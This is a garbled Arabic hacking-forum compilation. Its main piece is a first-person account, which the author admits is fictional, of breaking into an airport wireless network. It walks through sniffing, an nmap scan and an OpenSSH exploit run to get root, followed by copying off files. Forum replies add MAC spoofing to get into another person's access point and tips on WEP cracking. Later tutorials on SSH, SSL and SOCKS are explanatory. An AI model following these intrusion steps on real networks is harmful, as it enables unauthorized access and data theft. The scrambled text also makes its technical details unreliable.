
كنت استغرب من ھؤالء االشخاص الذين يقتولن وقتھم في اشیاء غیر مفیدة لفراغ لذلك قمت بتشغیل انا على عكسھم تماما حتاج شئ لیملئ وقت ا ...

الحاسوب واالتصال باالنترنت الشكبات االسلكیة عظیمة خلصتنا من االرتباط بطول معین او حد معین اينما

169

كنت شبك مع االنترنت اينما كنت في السیارة على الشاطئ في العمل في االحیاء في الشقق في

المطاعم في النزل السكنیة والجامعات االنترنت معاك اني مستغرب انه واحد جالس في ماكدونالد وھو عم ياكل الھامبرجر وفاتح مع

حاسبه النقال والدھن عم يغطي لوحة المفاتییح شغلة روعة على كل حال انا مرتاح ومتمدد على كراسي االنتظار وخطرت ببالي فكرة ان

..اخترق شبكة المطار مھمكل ھذا الي فوق عالك مصدي ھون ال ..وبدات العمل

لكي التقط اي نقاط اتصال او Network Stumbler في البداية شغلت برنامج اي شكبات السلكیة في الجوار

عادة تتفاوت ..مقطة االتصال الوحیدة التي ظھرت لي ھي شبكة المطار الحمايات بین الشركات الكبیرة والصغیرة في الحماية والتامین على الشبكة

للشبكة MAC address استطیع ان اعرف عناوين الـ NetStumbler, مع برنامج القناة الي شغالة علیھا الشبكة نوع نقطة االتصال ھل SSIDمعیرف الخدمة

ھناك تشفیر ام ال وغیرھا الكثیر كله مشروح في دروس سابقة ..المھم القطت شبكة واحدة وكانت من النوع غیر المشفر

للتوضیح انظرالصورة االتیة

في شبكات WEP Wired Equivalent Privacy دة تستعمل تقنیة التشفیر عا

b 802.11من معامرية على الرغم من وجود طرق عديدة لكسره الى ان خبراء االمن مازل يستعملونه وطرق الھجوم علیه اما بالقوامیس او الھجمات النشطة او السلبیة وقد شرحنا

AirSnortو WEPCrackابقا كـادوات تكسر ھذه النوع من الترامیز سمن حسن حظي ان شبكة المطار لم تكن مشفرة النه لو كانت مشفرة لم يكن

لدي الوقت الكافي لسكر الحماية فلم يكن لدي اكثر من ساعة حتى يحین موعد سفري

لكي SSID اليجب علي اال ان اعرف معرف الخدمة WEPبدون التشفیر الـ

170

اذا الحظت في برنامج ة لیس مخفي او انه باسوردادخل الشبكة ومعرف الخدم نیتستمبر قلك شو ھو

K 2Wتبع كرت الشبكة لدي في نظام Configure االن يجب علیه تعديل الـ انظر الى التعديالت لكي تفھم اكثر

في الخطوة التالیة سوف اعطل مفاتیح التشفیر لعدم وجودھا في الشبكة

المراد اختراقھا

..مفعال سوف اصبح داخل الشبكة فورا DHCPفي حال كانت بروتكول االن

رجاع درس االخ سايلنت نیدل حول ھذا الموضوع كیفیة تفعیل ھذا البروتكول ماھو كل شارحه االخ في التفصیل بالمناسبة اوجه تحیة الخ سايلنت على

كذا وقتھا كان اسمي غیر ..جھوده معي من فترة قديمة لما كنت في بدايتي عشان كده مش حیعرفني

%100 ياحالوته ياجماله والكونكشن

..االن بعد االتصال لم تظھر اي رسائل خطاء

171

االن خلینا نشوف ھل انا اصحبت في الشبكة شغلت محث الدوس ورحت كاتب االمر التالي

:كودipconfig>\:C

IP Configuration2000Windows :Ethernet adapter Wireless

us.ca.state.atc.host. : specific DNS Suffix -Connection 192.168.1.103. . . . . . . . . . . . : IP Address 255.255.255.0. . . . . . . . . . . : Subnet Mask

192.168.1.1. . . . . . . . . : Default Gateway جمیل جدا انا في الداخل

:كودcom.astudiograndide.ping www>\:C

bytes of 32with ] 216.127.70.89[com .grandideastudio.Pinging www:data

241=ms TTL80= time32=bytes: 216.127.70.89Reply from 241=ms TTL70= time32=bytes: 216.127.70.89Reply from 241=ms TTL70= time32=bytes: 216.127.70.89Reply from 241=ms TTL80= time32=bytes: .127.70.89216Reply from

:216.127.70.89Ping statistics for ,) loss0% (0= Lost , 4= Received , 4= Sent : Packets :seconds-Approximate round trip times in milli

ms75= Average , ms80= Maximum , ms70= Minimum وياريتھا ping من خاللكم اوجه تحیة لمزود الخدمة السوري لمنعھم خدمة الـ

يجیلھم يوم من واحد كسالن الشئ ...وقفت علیھا شو بدي عدلكم لعدلكم الجمیل اني لست فقط عضو في الشبكة بل حصلت على االنترنت عن طريق

الشبكة ماھي المعطیات بعد الدخول لم اكتفي بھذا بل اصبح بداخلي ھاجس لمعرفة

التي يتم ارسالھا عبر ھذه الشبكة عبارة عن شاشة مراقبة للباكیت المرسلة عبر AiroPeek NXلذلك شغلت

Sniiferالشبكات االسلكیة شنو كنا نسمیه

172

مارايك بان ترى صورة للبرنامح وھو يعمل

ھنا برقت عیناي FTPوانا اراقب الحظت ان شخصا قام بفتح خدمة الـ

فكرت بان قد يكون اتصل بشبكة اخرى لست في مجالھا او لنفرض انھا شبكة

اقدر ادخل علیھا واكشف الشبكات FTP السلكیة وقلت لنفسي عن طريق الـ كاملة

تركت السنیفر يعمل لیتلتقط المزيد عبارة عن يونكس شل Cygwin ,من جھازي والن نظامي كان ويندوز شغلت

لكامل للشبكة وقررت معرفة الرينج ا شرح وال اروع ترقوه في المنتدىHunter - B شرحھا اخوي Nmapوشغلت

ونفذت الكوماند االتي

173

.*.*192.168oN scan -O -sS - nmap 2.02$-bash cat scan2.02$-bash

-nmap : as2003 22:32:28 17scan initiated Mon Mar ) 3.00. V(nmap # sS .* .*.168192oN scan -O Interesting ports on SPANDEX ):192.168.1.102( )closed: ports scanned but not shown below are in state1595The (

Port State Service srv-tcp open loc/135 ssn-tcp open netbios/139 ds-tcp open microsoft/445 IIS-or-tcp open NFS/1025 rmnte-or-tcp open LSA/1026

tcp open IIS/1027 Windows , 3 or Beta2 Beta5Windows NT : Remote OS guesses

Millennium Professional2000MS Windows, or WinXP, 2000Win , )Me(Edition

K2W/1RC 3Advance Server Beta ):192.168.1.109(Interesting ports on )closed: below are in stateports scanned but not shown 1588 The (

Port State Service tcp open ftp/21 tcp open ssh/22

tcp open smtp/25 tcp open domain/53

tcp open http/80 3-tcp open pop/110 2tcp open imap/143

tcp open smux/199 tcp open https/443

tcp open imaps/993 s3tcp open pop/995

174

en mysqltcp op/3306 tcp open postgres/5432

)2003 00:12:59 10since Mon Feb ( days 35.940Uptime

البوكس االول الذي اكتشفته االداة كان يحوي نظام ويندوز من الخدمات كان ..مبین

وغیره النه كل ھذه FTP والبوكس االخر اعتقدت انه مان لخدمات المیل والـ ...الخدمات كانت مفتوحة

لذلك ..ورايت بان المضیف الثاني يجدذبني اكثر بسب الخدمات الموجوده فیه للعبة ققرت البدء با

ورايت من االفضل ان اخترق البوكس الثاني واذا زاد لدي وقت ارجع للبوكس االول

تعطیك امتیازات الرووت لذلك قررت البدء فیھا SSHكان لدي استثمار لخدمة

:كود22 192.168.1.109 telnet 2.02$-bash :كود...192.168.1.109Connecting To .’]^Escape character is ‘

3.4_OpenSSH-2.0-SSH يالھي النسخة الموجودة كان فیھا الخطاء وكانت عرضة للھجوم

:كود

gobbles/ cd 2.02$-bash 192.168.1.109l root –ssh ./2.02$-bash

2remote host supports ssh] x[ [*] 2remote host supports ssh[*] 1. vs2 : Protocol major version differ[*] interactive method available-keyboard[*] key:root: erus_server

exploitation: mode[*] 60rep _ scode0: rep_ tcode4096:size_chunk . . .PpppPppppPppPpPppPppPpppPppPpp....

GOBBLE 386 i#94 GENERIC4.0OpenBSD tux

)wheel(0=groups) wheel(0=gid) root(0=uid

175

whoami# root

على السیرفر #خذت ابعد الحصول على الرروت قررت الحصول على ايع معلومات تفیدني وقرر ت

معرفة لماذا كان يستخدمون ھذا البوكس log..قررت مشاھدة الـ

:كودlog.dispatch/tmp/cat # :كود

DISPATCH LANDING REPORT AIRPORT TIME

IRCRAFT MILESDATE FLIGHT DEPART ARRIVE DEPART ARRIVE A 805E /712B/ T0:01 21:43 FLL YYZ 498 TRS9MAR 538A /80MD/ T0:13 23:11 AVP YYZ 833 MRA9MAR 73G /208 C0:22 22:03 MHT YYZ 234 SWA9MAR

1447R /737B/ T0:25 21:29 IAH YYZ 426 COA9MAR 146I /145E/ T0:31 23:00 CVG YYZ 2120 DAL9MAR 638E /752B/ T0:43 :2722BWI YYZ 3170 AAL9 MAR 272E /739B/ T0:46 0:02 BOS YYZ 3490 BTA9MAR 126A /208 C0:52 23:50 ABQ YYZ 618 USA9MAR 250R /733B/ T0:58 0:18 PHL YYZ 7454 MTN9MAR

كمنت االى سجالت الطیران كنت اتمتم يالي من ,,كان الملف يبدوا مثیرا فضولي

قررت القاء نظرة على المحتوى طبعا لم افضل الدخول فورا عن طريق المتصفح >/.109.1.168192://http<

وغیرھا logللتفادي من االكتشاف بملفات الـ logات الـ الناس تحب بطبیعة الحال ان تشیك كل فترة على ملف

على الرغم ان طول فترة التصال بالشبكة كنت مجھول الاريد فعل حركة فیشك بي من يعرف قد اقرر الرجوع مرة اخرى

/html /www/varورفعتھم على الدلیل *.* tarضغطت االمور التي اريدھا بضغط ومنھا رفعتھم على جھازي نه مجاني في نظام ويندوز ا GuildFTPdسحبتھم عن طريق برنامج

وعیوني لم تصدق gif .0nondescript tmpedوانا استعرض الملفات رايت صورة

176

ماريت ھل ھذا نوع من التحكم االلي بالطیران سالت نفسي

سمعت صوتا يقول ايھا السیدات والسادة جھزوا انفسكم للرحلة القادمة احملو بطاقتكم تاكدوا من

جوازات السفر نظام المالحة وحفظه عندي لكن السف لیس لدي اللعنة كنت اريد مشاھدة

حیث عندما تعید hibernate mode ,الوقت للذلك حفظت الجھاز بوضعیة تشغیل الجھاز يكون كما لو كان شغال يعني يحفظ لك كل العملیات الجارية

..سارعت بوضح المحمول في حقیبتي والصحیفة ايضا وانتقلت للركوب بالطائرة

االمواج المنطلقة من الشبكات واالجھزة المحملة وغیرھا ..السماء صديقة على كل حال كرسي المغطى بالقماش االبیض ساعد على امضاء بعض الوقت

.....المفید :كود

References .1 >/com.netstumbler.www://http, <Network Stumbler .2 e Key“Weaknesses in th,Shamir. and A, Mantin. I, Fluhrer. S ,2001. ” Aug,4Scheduling Algorithm of RC

>ps.ksa_4Rc/Papers/4RC/itsik~/il.ac.weizmann.wisdom.www://http< .3 Security of the WEP)In(“, Wagner.and D, Goldberg. I, Borisov. N

html .faq-wep/isaac/edu.berkeley.cs.isaac.” www,Algorithm>html.faq-wep/isaac/edu.berkeley.cs.isaac.www://http< .4 >/net.sourceforge.wepcrack://http, <WEPCrack .5 >/com.shmoo.airsnort://http, <AirSnort .6 ,WildPackets AiroPeek NX

>nx_airopeek/products/com.wildpackets.www://http< .7 >/com.cygwin.www://http, <Cygwin .8 >nmap/org.insecure.www://http, <Nmap .9 ,Response Buffer Overflow Vulnerabilities-OpenSSH Challenge

>5093/bid/com.securityfocus.www://http< .10 /com.guildftpd.www://http, GuildFTPd

..ارجو انكم تكونوا استفدتوا بتجربة عملیة یة ستجد نفسك مخترقا صحیح القصة خیالیة بس لو انك اتبعت الطريقة التال

177

....شبكة بل ومسیطر علیھا يعني مثلك مثل اي ..تنبیه انك دخلت للشبكة لس معناه انك سیطرت علیھا

..عضو لیس له صالحیة Hacking is Easy

I wanna send a Bigger greetZ to all My Frinds Hunter -B,, AlNary ,, Syrian Hacker

اتركوني بس لكمل القصة على ھدوء ورواء ..قب االثر السیناريو الثاني تع Wireless -Snortشباب شیكوا على مشروع

>/org.wireless-snort.www://http< ..شوفوه وردولي خبر

اما عن االسئلة التي تسال فسوف افتح لھا موضوعا خاص عشان نجاوب علیھا ....كلھااااااااااااا

...تي سالت اجوبتھا بین السطور مع انه الى االناالسئلة ال ...بالنسبة للسوال االول الذي طرح

راجع درس االدوات ...يطلعلك ياه NetStumber عناون الماك ادرس برنامج الـ واقراه كويس ..

اما اسوال الثاني بماانك قريب جدا من الشبكة لدرجة ان الكرت يلقطھا فھذا لشبكات الي انت القطھا وعیش حیاتك واذا يعني انك تعرف معرف الخدمة بتاع ا

لم ينفع علیك بالماك والقراءة الجیدة لھذه الدروس وغیرھا

:النقاشات

: بالحقیقة انا عايش نفس القصة بس مو بالمطار والقصة ھي ,جدا جمیلة قصة :ان يحكى

انا في يوم من االيام كنت جالس مع صديقي في المكتب وصديقي كان يملك

انترنت ويقوم بتوزيع االنترنت في المنطقة عن طريق الويرلس بواسطة منظومةوانا كنت عارف البسويرد client بوينت أي يعمل االكسس بوينت االكسس

وفتحت الروتر وقمت بالحث عن الماكات ادريس اللي مالت الروتر تبع صديقياك غريبة تحاول الدخول اقصد وجدت م مسموح لھا بالدخول فوجدت حاسبة

الحاسبة ابتاعي غريب فقمت بتسجیل الماك وذھبت الى البیت وشغلت وقمت بتزوير الماك ادريس ودخلت على االكسس بوينت ابتاعي عن طريق

كتابة االي بي ادريس في االنترنت اكسسبلورر وثم كتبت البسويرد ابتاعي واخترت المنظومة المقصودة وقمت scan net وقمت بعمل client وعملتھا

178

الحظة اصبحت داخل المنظومة واذا بالیاھو وفي log بالتفعیل ثم عملتعلى االخوة ھو برنامج نتستمبلر السؤال اللي اريد ان اطرحه. مسنجر يعمل

ھذه المنظومة او ھل يكشف الماك ادريس ابتاع الحاسبات اللي تعمل على راتلك ام يقوم بالكشف عن الماك ادريس ابتاع المنظومة فقط ؟ وشك

يرعض لك الماك ادرس بتاع الجھاز الـ NetStumberبرنامج الـ ..اخي الكريم

Server يعني ...شعان تعرف النطاقات الشغالة علیھا الشبكة ..او الرئیسيالني انا مالي بالحاسبات ..يشكف الماك بتاع المنظمومة ..على حیك

الشغالة وامر مستحیل اعرفھا

KAMRAN -2 ف ارقام الماك ادرس الموثوقه عشان اقدر ازورھا ؟؟؟ كیف اعر

للینكس Kimsetاو NetStumberعن طريق برنامج

قیس علي اج 3-

واالثنان يعمالن في airodumpو aircrackممكن اعرف الفرق بین wzcook ممكن اخي تشرحلي كیفیة العمل علیھما وھل ھما يعمالن

ة يعمالن في الوندوز لكن ممكن في الوندوز ؟ طبعا حسب ما قراء تشرحلي كیفیة العمل علیھما واكون ممتن لك واالخوة في المنتدى

..للتشفیر ..تقوم بعمل كسر بالقوة العنیفة .. AirCrackنعم بامكانك المعرفة فستخدمھما عندما تكون عضو بالشبكة عضو موثوق AirDumpاما الـ

Manual****** Read The Fل اقول لك ھ ..اشرح لك كیفیة العمل علیھما 4 -WaNeS

في المنطقة التي أنا فیھا توجد شبكتین السلكیة وطبعا حاولت الدخول علیھا لكن طلب مني الیوزر والباسورد لكل شبكة أسم يكتشفھا كرت

الشبكة من دون أدوات بحكم قربھا وأعتقد أن الباسورد أكتشافه معقول سلكیة يطلب منك كلمة وعلى حسب ھذه ألنه عند عمل شبكة ال

الكلمة يقوم بأعطائك خیارات للباسورد فھل ھذا الباسورد متغیر أم الء طبعا أسئل G 54 WAG-G ADSL Gateway -Wirelessجھاز الشبكة

لألستزادة فقط واهللا يغنینا بحاللة عن حرامه وأعتقد بأنه ھناك جدار شكرا حماية للتصدي لمحاوالت األختراق و

179

ھذا بعد ان تسیطر على Firewallاوال مالك ومال جدار الحماية بعدين اسمه الشبكة تحاول تحسب حسابه مش قبل

كل ماعلیك 100 %ثانیا بما ان كرت الشبكة يلقط الشبكات معناه انتم بمداھا للماھجمة ..استخدام الطرق المشروحة

قیس علي اج 5-

او access pointھل يعمل مع umbler netstاخي بالنسبة للبرنامج wireless card فانا امتلك اكسس بوينت وعندما اعمل على البرنامج

المذكور واعمل سكان يخرج عبارة اليوجد كارد ويرلس علما انه انا رابط 2 اكسس بوينت فما العمل ؟ الوندوز المستخدم اكس يي سیرفز باك

Hunter -Bاالجابة اتت من اخي

اص بالكروت النه يدور على االكسس بوينت ما يدور على الكروت ھو خ لو كان بجھازك كرت قم بتفعیل الكرت وشغل البرنامج وبیشتغل

ال دخل للبرنامج باالكسس بوينت على االطالق النه يبحث عنه ال يبحث منه

الى اللقاء

Hunter -B-6 2200نتل يا سالكر انا ابي اي برنامج يقدر يتعرف على تشیب اال

"تتعرف علیه بشكله الحقیقي "في لینكس "المشكله انه كل البرامج بالظبط مثل "ولذلك ما يدعموه وخصوصا كیسمیت "تشیب ولیس كرت

عندك حل ؟ الى اللقاء "مشكلة الوين مودم سوفت ولیس ھارد

لى مثل ماقلتلك مشلكة الوين مودم او الكروت الداخلیة على اتي تركب عيعني النظام الي ..بان قیادتھا التكون ھاردوير بل سوفت وير PCIمداخل

..بل يجب ان يكون ھناك تعريف ..يشوف تعريف التشیب مايقدر يقود الكرت او تدور اذا كان ..اما ان تبرمج برنامج قیادة او تنتظر دعم للكرت تبعك .والحل ئانا صراحة مادورت على ھیك ش pluginsھناك

7 -zdce

شكر الك خیو على ھالموضوع الي 1000000000000السالم علیكم واهللا اكثر من قمه وبتمنا انه ھالموضوع ما يوصل لحد معین ونوقف ويا

180

حبذا اخي تسترسل بالشرح النه موضوووع حلو كثیر وممتع كمان اخووووي ممكن اتساعدني وتحكیلي كیف اركب برنامج

ركبته على ويندوز اكس بي بس المشكله bler Network Stumالسكانشفلك حل لحلمشكله مع No wireless adaoter foundايضل يحكییلي

العلم اني شابك نت عن طريق الالسلكي وكمان كرت الشبكه عندي Macronix وكمان اذا ما بنفع ھاد موجود كرت شبكه انتل واالخوه ما

الشرح تبخلو بالرد مالحظه ارجو االسترسال ب

...ياحبیبي الحل الناھئي لمشكلتك انك تعرف كرت الشبكة عندك او قك بالغاء التعريف ومن ثم عرف وشغل الكرت وشغل البرنامج وقتھا يلقط انه

Scanوابدا بالـ ..عندك كرت شبكة قیس علي اج 8-

وجدت بموقع airesnortاخي بالنسبة للبرنامج ,شكرا على الرد السريع فھل ھناك احد جرب العمل xpرنامج االرسمي بتنه يعمل مع الوندوز الب

انا حالیا سوف احاول تجريب العمل به على ,.به على الوندوز وشكرا xpالوندوز

اخي انا مجربه على لینكس لكن باان الشركة نفسھا عامل نسخة منه لنظام

Windoze معناه نفس الشئ قیس علي اج 9-

ھل ھي اداة جديدة ويمكن العمل aircrackراءيك باالداة اخي العزيز ما ويمكن بعض المعلومات .بھا في بییئة الوندوز وشكرا على االجابة مقدما

عنھا من خالل تجربتك الشخصیة مع ھذه االداة ان كنت سبق وان .تعاملت معھا

ر االداة جیدة في مجال كسر التشفی Tool ...اخي انا مش مھمتي اني اشرح

..... WEP ويمكن االستغناء عنھا واستعامل.... WEPCrack والـReadme موجود

___________________________________________________________________________________________________________________________________________________________________________

_________________________________________________________

181

ssh برتوكول القشرة االمنة

root- Linux:للكاتب

ssh برتوكول القشرة االمنة

كبرتكول ارسال منخفض ssh or secure shll تم تطوير برتكول القشرة االمنة بعید عبر الشبكة المستوى امن ويتیح للمستخدم تسجیل دخوله لكمبیوتر

. وتنفیذ اوامر فیھا ونقل ملفات من كمبیوتر الخر في الكمبیوترات المتوافق معrlogin -rsh-rcp- telnetا يحل محل sshمن الفاية

Linux 2بأرسال امن للملفات تم تطوير لتزويدھا sshكبديل للـftp . االتصاالت عبر االنترنت بتشفیر كلمات المرور والبینات تحمي ssh تقنیةالمضیف والمستخدم وضغطا للبینات وحماية لسرية تحقق لصحةsh sيزود

لیس مصمما لیحمي عیوب نظام لكنه.البینات وتشفیر قوي للمعلومات . التشغیل

: ثاللث مكوناة رئیسیة من ssh يتكون برتكول اقشرة االمنة

trans- sshبرتكول طبقة االرسال1-

. وسرية وسالمة الشبكة يزود تحققا امن userauth- sshبرتكول التحقق من صحة المستخدم2-

.االرسال يتحقق من صحة المستخدم من جھة العمیل ويعمل فوق طبقة connSsh برتكول االتصال3-

ويعمل فوق برتكول التحقق من صحة يرسل تعقیبا مشفر في عدة منظقیة .المستخدم

: التالیه ايضا من االخطار ssh ويحمي . متزوير الرز1- .المضیف Ip تزوير2- .التنصت3-

182

الجزء األول Ssl شرح

Acid Burn:للكاتب

=====================

:INTRODUCTION TO SSL =====================

بأى موقع عن طريق الصدفه طبعا اكید فى يوم و انت تتصفح االنترنت و اتصلتموجوده اره عن ايقونهو ھى عب PADLOCK ICON فأنك تالحظ ما يسمى بال

صفراء ! فى الشريط فى اسفل متصفحك و ھى تكون عباره عن عالمه تعجب حمراء و لھا اشكال اخرى كثیره تختلف حسب متصفحك X او عالمه

ھذه العالمه؟ و االن سؤالنا ھو ماذا تعنىامنیه و اى طبقه ssl و االجابه ان ھذه العالمه تعنى ان ھذا الويب محمى ب

و ھى ) Secure Sockets Layer (ھى ال ssl ھو ظاھر فى العنوان ان الكما الى بروتوكول او تیكنیك معین يؤكد االتصال االمن بالويب سیت و تفعل تشیر

توفر طرق عديده للتعرف على ھويه SSL ھى ان ال:االولى . ھذا بطريقتینل بالويب من الدرورى معرفه ھويه المتص المتصل بالويب سیت و طبعا النه

مطلوبه جداا ب ال SSL ال سیت قبل بدايه تبادل المعلومات بینھم و تكونdigital certificates انھا تحول :ھى و الطريقه الثانیه. و سنعرف ما ھى

اى الى صیغه ال تستطیع قرائتھا اى UNREADABLE FORMAT المعلومات الى . نترنتتشفرھا عند انتقالھا خالل شبكه غیر امنه مثل اال

: لتسھیل الفھم SSL بسیط عن ال اذن نرجع نقول تعريفالتي تنتقل من المتصفح ھى نظام أمني يسمح للتطبیقات بتشفیر البیانات

الى وحدة الخدمة المقابلةفسوف نتكلم عن SSL ھذا الدرس عن ال و سوف نتكلم عن اشیاء كثیره فى

عن كیفیه عملھا و لماذا نقوه حمايه ھذا البروتوكول و سوف نتحدث ايضا ع االحیان ايضا تكون صالح للدفاع ضد الھاكرز و كیف تساعد الھاكرز فى بعض

Digital و االن قد ذكرت كلمه اعتقد ان البعض لم يفھمھا جیدا و ھى كلمهCertificates و سنقوم االن بالتفسیر لمعناھا.

:Digital Certificates

======================= و ھو عباره Digital Certificates جیدا يجب اوال ان تفھم ال SSL تفھم اللكى

183

بوضوح تام عن میكانزم او بروتوكول يستطیع تحديد اى شئ او التعرف علیهو نحن . مثل شخص او ويب سرفر فى نظام متكامل و واسع مثل االنترنت

المعرفه االنترنت نظام مفتوح و واسع الننا ال نملك السیطره و نسمىھذا يحتوى Digital Certificates ال. يستخدمون ھذا النظام باالشخاص الذين

ھويه المستخدم للنظام و يؤمن االتصال بین على المعلومات الذى تحدد و يمتلك ھذا ال. الكامل على ھويته المستخدم و النظام ايضا كما قلنا بالتعرف

Digital Certificates الحكومات و البنوك و و الشركات ثالث جھات عالیه و ھم public يسمى ب ال على ما Digital Certificates و يحتوى ال.الكبرى

encryption key لحامل ھذا ال Digital Certificates او شركه سواء كان بنك .الخ...

:و لنعطى مثل للتوضیح المعلومات بنكیه مھمه بأستخدام و لنفرض ان بنك من البنوك يريد نقل

encryption معناھا تشفیر و طبعا ھذه و طبعا االن عرفنا معنى ھذه الكلمه و publicب ال التشفیر يجب ان يكون له مفاتیح و ھذه المفاتیح ھى ما يسمى

.encryption key اعتقد االن فھمنا ما ھى مفاتیح التشفیر الذى يتضمنھا ال . Digital Certificates لمفاتیح حیث ان االنتقال عبر و طبعا يجب وجود ھذه ا

غیر امن و لذلك توجد ھذه المفاتیح لكى تؤمن وصول المعلومات دون االنترنت .الجھه االخرى التى تصل الیھا المعلومات تسرب و دون معرفهتسرب المعلومات عن طريق استخدام ھذا المانع اى SSL و بالتالى فتجتاز ال

الحرفیه لھذه الكلمه ھى ه الترجمهو على فكر Digital Certificates النظام عالمى و لكن من االفضل ان تتعامل معھا على انھا" شھادات رقمیه"

SSL .للتعرف على الھويات و التشفیر و يستخدم عن طريق اليحتوى ايضا على مفاتیح Digital Certificates فھمنا االن ان ال و طبعا فقد

.فك التشفیر عن المعلوماتعند الحاجه ل التشفیر التى تستخدمسرفر معین فیكفى ان يكون لتشفیر اصال ب ويب SSL عندما نستخدم ال

انفسھم للويب و يمكن للمستخدمین تعريفcertificate .السرفر وحده لديه ال SSL او الباسوردس و كما نرى ان ال PIN CODES عن طريق الیوزر نیمز و ال

3 Vمستخدم بتعريف نفسه بأستخدام الاالن تستطیع اعطاء الصالحیه لل Digital Certificates و ھذا التعريف يسمى ب.اى نظام التشفیرclient side '

' authenticationاى توثیق جانب المستخدم و ھذا طبعا يزيد من امن الموقع .

184

الجزء الثاني Ssl شرح

Acid Burn:للكاتب

اتمنى اكون اقدم لكم SSL المره اخرى نتقابل فى الجزء الثانى من موضوعمواضیعى و احب ان اكتب كلمه شكر لكل من اعطانى كلمه االستفاده من

موضوعى و االن دعونا نكمل الدرس يمكن تشجیع و لكل من كتب رد على .يكون شیق ھذه المره

:The Value of Server Certificates of Authentication ===================================== بتقديم ال SSL يسمح لل DIGITAL CERTIFICATES استخدام ال

authentication للمستخدم اى بتقديم التوثیق او الثقه بمعنى انھا تعطىو ھذه . به الیوزر ھو فعال السرفر الذى يريده الیوزر الوعد بأن السرفر الذى يتصلان سیقوم بأستعمال بالنسبه للیوزر خاصه اذا ك طبعا تعتبر نقطه ھامه جداا

PIN CODE نمبر الخاص به او ال معلومات شخصیه مھمه مثل الكريدت كارد .لشئ ما مھم بالنسبه له

الذى يتصل به الیوزر ھو لیس السرفر الذى يطلبه و لكن كیف حدث ان السرفر ؟

ففى االنترنت نعرف ان الويب سرفرس تكون . االنترنت العملیه تعتبر سھله فىفتعريفه ھو انه رقم IPسرفر و بالنسبه لل نمبر الخاص بكل IPالمعروفه ب

صعب جداا على االنسان و BIT NUMBER -32 UNIQUEفريد من نوعه يسمىو Domain Name System اى ال DNS ال. تذكره او حفظ كمیه كبیره منه

الى اسماء سھله IPمیكانزمات اخرى كثیره تتحكم فى تنظیم و تحويل الارجو من االخوه ' com.internetbanking.www ' .النسان تذكرھا مثلا يستطیع

.لمعرفه القصه بالتفصیل DNS االول عن ال مراجعه موضوعىفى ' com.internetbanking.www 'و االن عندما يكتب يوزر عنوان مثل ھذا

السرفر او الموقع متصفحه و يضغط انتر تحصل عملیه معقده اليجاد ھذاكبیر من ھذه و لكن يوجد جزء" عو الموضوع االول لمعرفه العملیهراج"المطلوب

العملیه لھا العملیه يكون دائما ما بعد تحكم الیوزر و الويب ادمنستراتور و تكون بمعنى ادق انه عندما يطلب الیوزر موقع.قابلیه للھجوم علیھا من عده نقاط

فھو معرض الن يكون اى موقع بنك اذن ' com.internetbanking.www 'مثل ھذا .يتحكم فیه مھاجم او ھاكر و لیس البنك نفسه متصل بسرفر

:بمعنى اكثر توضیحاان ھاكر صمم ويب مماثل تماما دون ادنى اختالف اى تعتبر تخیل معى لو

185

البنك فسوف يستعملون الیوزرس طبعا ارقام نسخه مطابقه الى موقع ھذاالموقع و بعد الكتابه و الضغط فىالخاصه بھم PIN CODES الكردت كارد و ال

مثال كل ما يظھر على على زر انتر لتنفیذ اى عملیه مثل تحويل مبلغ معین please try " there was a technical problem with the site andالشاشه ھو

". again later و فى نفس. اى ان ھناك مشكله فى السرفر و حاول مره اخرى لھاكر قد بدء بأستخدام الرقم المكتسب الجديد لسرقه ھذه اللحظه يكون االموقع الحقیقى فى راحه تامه دون اى ازعاج من البولیس بعض االموال من

و ھناك الكثیر مما يمكن التحدث . خبیثه و ذكیه ھل رأيتم كیف تكون االنترنتوضوع لكننا سنتركه االن و لنركز فى الم عنه و عن انواع مثل ھذه االختراقات و

. االصلىتخطى ھذه المشكله او تحاول الوصول الى ھنا ھى انھا تحاول SSL و دور ال

digital داخل ال DNS السرفر الحقیقى المطلوب عن طريق تخزين الcertificate فعندما يتصل .صحیح و بذلك فیقوم بالتعرف علیه بوضوح تام و بشكل

موجود فى اده بأن ھذا العنوانفیقدم السرفر الشھ SSL يوزر بموقع يستخدم ال الفالنى فیقارن المتصفح العنوان للموقع الذى تريده بما تحتويه DNS ال

و لذلك فسیكون الیوزر متأكدمن صحه الموقع و certificate .الشھاده او ال المتصل بھم و اذا بالموقع فیه اى عطل فسیخبر الیوزر عن طريق ال السرفر

UP WINDOW -POPلیوزر متأكد من ان ھذا السرفر فعال لديه شھاده سیكون ا و .صحیحه

ثانیا لو انه حصل نوع من المھاجمه مثل الذى دكرناه فى و االن تخیل معنا. بتصمیم نسخه طبق االصل من موقع البنك االعلى و ھو ان يكوم ھاكر

SSL لسھله لیخدع بھا ال للمعرفه طبعا ان الھاكر ال يعرف اى طريقهtion mechanism authenticaاى میكانزم توثیق او ثقه ال SSL لذلك يترك و

جانبا دون ان يضعھا فى التصمیم لموقعه المطابق للبنك و و SSL الھاكر ال لیكون ھو digital certificate لذلك فأن موقع الھاكر ال يكون لديه شھاده من ال

و لديه SSL تخدم الالموقع الذى يطلبه الیوزر الن موقع البنك االصلى طبعا يسو يمكن الفارق الوحید الذى ستراه .ثقه على انه ھو فعال موقع البنك شھاده

االيقونه الصغیره التى تكلمنا عنھا فى الجزء االول من بین الموقعین ھىو لذلك SSL ھذا الموقع محمى بواسطه ال الموضوع و ھى التى توضح ان

و بذلك فعلى . االصلى سھل جداا قعفیكون التفريق بین موقع الھاكر و المو .الموقع المزيف الیوزر ان يمتنع عن استعمال معلوماته الشخصیه فى

جداا و لكن بعد تقدم توثیق او ثقه مؤثره SSL technology ان ال, للتوضیح اكثر اقتناع كل ھذا فنجد انه ھناك عدد غیر كاف من الیوزرس ھم فقط المقتنعین

فى المواقع و لذلك يجب علینا التطوير فى انفسنا و SSLتام بأھمیه وجود ال

186

.يجب علینا االنتباه لمثل ھذه االشیاء الصغیره حتى نكون فى أمان تام

ان يكون الجزء الثانى من الموضوع نال اعجابكم ھذا الجزء الذى وضحنا اتمنىانه فى و قیمه التوثیق التى تعطیه للسرفر لكى يتأكد الیوزر SSL فیه قیمه ال

الھاكرز أمان تام من امثل

187

Socks ما ھو بروتوكول

r3d0 Smart C:للكاتب

SOCKS الیوم سوف أقوم بشرح فكرة بروتوكول السوكسرأيته في إحدى الكتب اإلنجلیزية فأحببته نقله وآلیة العمل طبعا ھذا الدرس

مترجما ھنا و تطبیق أنظمة واستخدام Socks شرح لبروتوكول وفي ھذا الدرس راح نعرض

Proxy gateway مدخل البروكسي

... بسم اهللا نبدأ----- ؟ SOCKS ما ھو-----

Socks بروتوكول بروكسي عام ألسس ھوIP / TCPلالستخدامات الشبكیة Networking

